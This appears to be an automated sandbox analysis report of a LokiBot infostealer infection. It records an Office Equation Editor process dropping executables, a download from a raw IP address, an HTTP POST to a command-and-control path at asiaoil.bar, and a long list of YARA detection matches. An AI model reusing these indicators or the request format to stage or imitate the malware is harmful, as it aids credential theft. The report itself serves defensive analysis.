              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Tlu5Y7AoBorQeMU0%2B32D%2BTFyCDvUY1OQkVB8rypJEdhrQ%2Fenzeu1n%2FT9n9uSqWWX9J%2BfmRJVbTKpt0De%2B5ne1ly1J723TtCWodVcJOhHfjabsPPmaz0oqCOHEICNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4467d0fb492c5-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqldRdslDF9crV%2Bk4ngGcH%2B5VotqLHwZM1hgM1UlLzVHOK203cYnXP5jYPCyykRHqAUueXlxKMSBzyNAjlM%2Fvqw8Nwi0ss%2FzYQhSE9EUH9wjaK0hKyn3kcN4463E9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446836b79922b-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yBS7%2BxqKYn8UXFWYtCxhAQUq3wICMu07YMkjyXgzMiD7WnMo34wuo3JBZQt3f%2FvhAz73H9wPdN018HSvgXnDpUBiOvoVzzkvgWsPGM8s4%2F62axP9o7SVvlxiAsFAoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4468a3cbe8fc8-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K0AcT1bifDuMhi7ufsGdy3ZWrMEsl7Ml0%2BBsoYKk1Le07SGb1K3vfiYvudRQACEJNwZd7L%2BjjiNvFHdUhY8ZVQ%2FCWgWD2crnmZAbKNk%2BQ47TcQ8b%2FoLYdTuy2B3gQQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44690dd409094-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2b3lnzs0K50M9KlApGlxtS1%2FGBbpcngBLWZrh0QHIPyWMt9R51HhBbpbNzNiN2fgnCx%2F6Ol9cv3FYjGdC9Z4%2Ff%2B7v%2FeKPnRbogo3FCV4owbNiUoY5%2BcPZ%2FGa%2BNALAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446972bed9091-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lLUedeVgcznC2S%2FUOpbd3fV7v3cGuLCjsT%2FMbiJAVwvVHvZbCBonSZeAGG5JhojOiJyGydHeh3PL5Tp9nmU4EBUX2wVPhLZEEPBr7kenjFn1%2BoSu1sUFZrFUzTyPOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4469d8ada926e-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pP7Hm%2FZYo7nBNCdlCm%2B6iCgzILR5XUlKf4GwH1GgSKX5qjvCOl3q7%2FhYlNsVlCRNbRgfIjWoULsECCJWVGVm8TwlUOckIQOjjEp9dOME2g%2F3YvZInDvXJ3pNqXehHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446a48a19903d-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B4Hpj5tBS1W25DrOmF70H9%2B7tI00TcoHrZ2vWxTGczWKIQtBUxqfhFCMGDZXE%2FiPTxLHEXRSNrcwpGvMMbC3NGIUBMWmkmFsI9cJLit7sz%2BX56ge756zUtFrYA%2Fn%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446ab4e2a9049-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2BJFLdnSBYTENDu1tAbRmg3yPPpEafzaD1AIG2OO%2FT%2B%2FQqTuiDGTxzFlf9dnChU0IP%2BEp15Zkavznvg6v0hcTAYsTYetiP8tjAE8TcK4xJqEQeCFqj2PFKCcO8YbOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446b23dcd9241-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rk9UBUg8rEXXmstTEerwpTwam6ReU4ftvK8vLG6DGGX39NP0Tj8xTjWk5qWPBqpC6tqrpuX%2FZqaa1n1qmYBhnF44n8KZVoyEqklrYO98Ih0UxdfXxgiW0okoqK2%2FCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446b88b306963-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtSZVRNhVan7fQu%2B%2BS3YF0dvuQRKfPnhQmljq7WJs%2Fj8JMEfpH8AMemLWNbqYw4tgA6v4NG3xTvYc3Z5%2FpGQb5ljWthkbv4uo%2FhbZQYC96NTyl%2B9dg2FM9CZdOcU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446bf3ee59235-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lp2m%2FnL%2FD9YbbOQL75qiqY1QRie4l95Zh1%2F9JFc7ntQcAGF4IIGoKgD%2F4oPRxszoZK9oVvGOpnhqWzAxSgnH3OqLPGrbcPmuYuhePgMIcrCkD3ZE2%2Bku1MZOs6ktMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446c57aff90af-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTMZeN6TFXbag2y1OBliS7F8Ve1jWw99EUBWoXAAGITxys1b9P94l43Uq0a%2B%2Fvyd8PfkcQkVRk9vtaYxi3J9PRjAhKWq89oNOgEI8T7X4pa5jNQ6EzOTmt9dPn8AJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446cbfd179273-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ixohb6DjBvyEHcF0bBjTjwa28InQY%2BYLPlgexuM%2B84%2F6oOs4V7fazNyzJ4xoT6rgqB9hhVA18VkbtDdbf8imwrd%2Bcpfb9TH%2BBpi1dLQ9%2FLh%2BYjGvjuxWzsCeqqBpA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446d23961910a-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EE%2FH1l4X4mMaNy6pFboc6LUO8GAlkZzav%2FOZJIxi5sLykIm1li2uICH5vhNS6WFsxhSSyzMACuulnYIlnwvZpCsgsM7VNvUGg6SyBgvKaTyfwg7BclNEWkPSWBEWjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446da4ba95c32-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=glNfx46H3%2BbVLTKDrhap51MhlIRkcModymLBNBd7dZ%2Bl67BTPpZNpBIlfD8OgL00wxL3CdtX6qUD2pekmgxeoZGkVArQG2lmbN%2B57FmuOEvY0CiRqZc24nnj2bPcgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446eac805911f-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YpuHPmOjZQu3BJ71RrU5rE6ZD4gK%2FiddjmVX1894nkleKqaO0ZuA%2FZ4t0Hhr%2FEBANQiy%2F1dOteI5pqxTSy6LKaSwgoWmbo0Tuise9gruTiTrmWfL3ef0CFnSmrOP6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446f1795e8fd4-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=263d7oWUNYmuRg8qalPaQG1rkbIXer23yE4CCwJl%2BycPuClpFI6FPf1gIeOZyF3Nt4DWuR0XxZA%2FK2Gwfg9%2FRUCXAmdrBxYU%2F%2FgwYdWQXfhfADT4oSnWfcr7aGjXFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446f7fa7290a3-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rZcJVrDpVn0Jvm1Vx3izcMxx2xxi%2BRY0gOKUM%2BjgWD%2BYJ2bGoZJPCLIhbsX3VLB%2FEbDTmlKbO8MOV5p8OY13hTQVrNs14q81gtqG%2BYeK%2B7ujkKePtZGTix4rgIZT4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446fe7f4690fe-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hiz8VTs2nqW2CMp0oz2HdrtKIKW9o%2B7ImEcKl2VS1ifwy0ulNriRcW%2FuIGG1IoL3PiyPTyaWq%2BPUB82nqy1x%2F7uZPeiH7cbbBHoH7NU9xoGBLymRw5hquZwyAOhtcQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44705396d911e-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: unknown
              TCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: vbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr
              String found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.dr
              String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              String found in binary or memory: http://www.ibsensoftware.com/
              Source: unknown
              HTTP traffic detected:
                POST //bobby/five/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: asiaoil.bar
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 579BFA72
                Content-Length: 176
                Connection: close
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AB951BC.emf
              Source: unknown
              DNS traffic detected: queries for: asiaoil.bar
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe
              Code function: 6_2_00404ED4 recv,6_2_00404ED4
              Source: global traffic
              HTTP traffic detected:
                GET /windowSSH/.win32.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 198.46.132.195
                Connection: Keep-Alive
              Source: C:\Users\Public\vbc.exe
              Code function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404F61

              System Summary
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
